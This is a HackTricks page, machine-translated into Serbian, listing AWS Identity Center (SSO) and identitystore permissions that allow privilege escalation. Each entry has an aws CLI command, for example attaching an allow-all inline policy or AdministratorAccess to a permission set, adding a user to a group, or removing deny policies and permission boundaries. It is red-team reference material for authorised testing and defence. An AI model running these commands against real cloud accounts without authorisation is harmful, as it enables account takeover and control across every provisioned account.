AWS - SSO & identitystore Privesc

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u:

AWS Centar za Identitet / AWS SSO

Za više informacija o AWS Centru za Identitet / AWS SSO proverite:

pageAWS - IAM, Identity Center & SSO Enum

Imajte na umu da podrazumevano, samo korisnici sa dozvolama iz Upravljačkog Računa će moći da pristupe i kontrolišu IAM Centar za Identitet. Korisnici iz drugih računa to mogu dozvoliti samo ako je račun Delegirani Administrator. Pogledajte dokumentaciju za više informacija.

Resetovanje Lozinke

Jedan jednostavan način za eskalaciju privilegija u slučajevima poput ovog bio bi da imate dozvolu koja omogućava resetovanje korisničkih lozinki. Nažalost, jedino je moguće poslati email korisniku da resetuje svoju lozinku, tako da biste trebali imati pristup korisnikovom emailu.

identitystore:CreateGroupMembership

Sa ovom dozvolom je moguće postaviti korisnika unutar grupe tako da će naslediti sve dozvole koje grupa ima.

aws identitystore create-group-membership --identity-store-id <tore-id> --group-id <group-id> --member-id UserId=<user-id>

sso:PutInlinePolicyToPermissionSet, sso:ProvisionPermissionSet

Napadač sa ovlašćenjem može dodati dodatna ovlašćenja Permission Set-u koji je dodeljen korisniku pod njegovom kontrolom

# Set an inline policy with admin privileges
aws sso-admin put-inline-policy-to-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --inline-policy file:///tmp/policy.yaml

# Content of /tmp/policy.yaml
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "Statement1",
"Effect": "Allow",
"Action": ["*"],
"Resource": ["*"]
}
]
}

# Update the provisioning so the new policy is created in the account
aws sso-admin provision-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --target-type ALL_PROVISIONED_ACCOUNTS

sso:AttachManagedPolicyToPermissionSet, sso:ProvisionPermissionSet

Napadač sa ovlašćenjem može dodati dodatna ovlašćenja Permission Set-u koji je dodeljen korisniku pod njegovom kontrolom

# Set AdministratorAccess policy to the permission set
aws sso-admin attach-managed-policy-to-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --managed-policy-arn "arn:aws:iam::aws:policy/AdministratorAccess"

# Update the provisioning so the new policy is created in the account
aws sso-admin provision-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --target-type ALL_PROVISIONED_ACCOUNTS

sso:AttachCustomerManagedPolicyReferenceToPermissionSet, sso:ProvisionPermissionSet

Napadač sa ovlašćenjem može dodati dodatna ovlašćenja Permission Set-u koji je dodeljen korisniku pod njegovom kontrolom.

Da biste zloupotrebili ova ovlašćenja u ovom slučaju, morate znati ime politike koja se upravlja od strane korisnika koja se nalazi U SVIM nalogama koje će biti pogođene.

# Set AdministratorAccess policy to the permission set
aws sso-admin attach-customer-managed-policy-reference-to-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --customer-managed-policy-reference <customer-managed-policy-name>

# Update the provisioning so the new policy is created in the account
aws sso-admin provision-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --target-type ALL_PROVISIONED_ACCOUNTS

sso:GetRoleCredentials

Vraća STS kratkoročne akreditive za dato ime uloge koje je dodeljeno korisniku.

aws sso get-role-credentials --role-name <value> --account-id <value> --access-token <value>

Međutim, potreban vam je pristupni token za koji nisam siguran kako ga dobiti (TODO).

sso:DetachManagedPolicyFromPermissionSet

Napadač sa ovom dozvolom može ukloniti asocijaciju između AWS upravljane politike iz određenog skupa dozvola. Moguće je dodijeliti više privilegija putem odvajanja upravljane politike (politika zabrane).

aws sso-admin detach-managed-policy-from-permission-set --instance-arn <SSOInstanceARN> --permission-set-arn <PermissionSetARN> --managed-policy-arn <ManagedPolicyARN>

sso:DetachCustomerManagedPolicyReferenceFromPermissionSet

Napadač sa ovlašćenjem može ukloniti asocijaciju između korisnički upravljane politike iz određenog skupa dozvola. Moguće je dodijeliti više privilegija putem odvajanja upravljane politike (politika zabrane).

aws sso-admin detach-customer-managed-policy-reference-from-permission-set --instance-arn <value> --permission-set-arn <value> --customer-managed-policy-reference <value>

sso:DeleteInlinePolicyFromPermissionSet

Napadač sa ovlašćenjem može ukloniti dozvole iz ugrađene politike iz skupa dozvola. Moguće je dodeliti više privilegija putem odvajanja ugrađene politike (politika zabrane).

aws sso-admin delete-inline-policy-from-permission-set --instance-arn <SSOInstanceARN> --permission-set-arn <PermissionSetARN>

sso:DeletePermissionBoundaryFromPermissionSet

Napadač sa ovom dozvolom može ukloniti granicu dozvole sa skupa dozvola. Moguće je dodijeliti više privilegija uklanjanjem ograničenja na skupu dozvola koje su date od granice dozvole.

aws sso-admin   delete-permissions-boundary-from-permission-set --instance-arn <value> --permission-set-arn <value>
Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u:

Last updated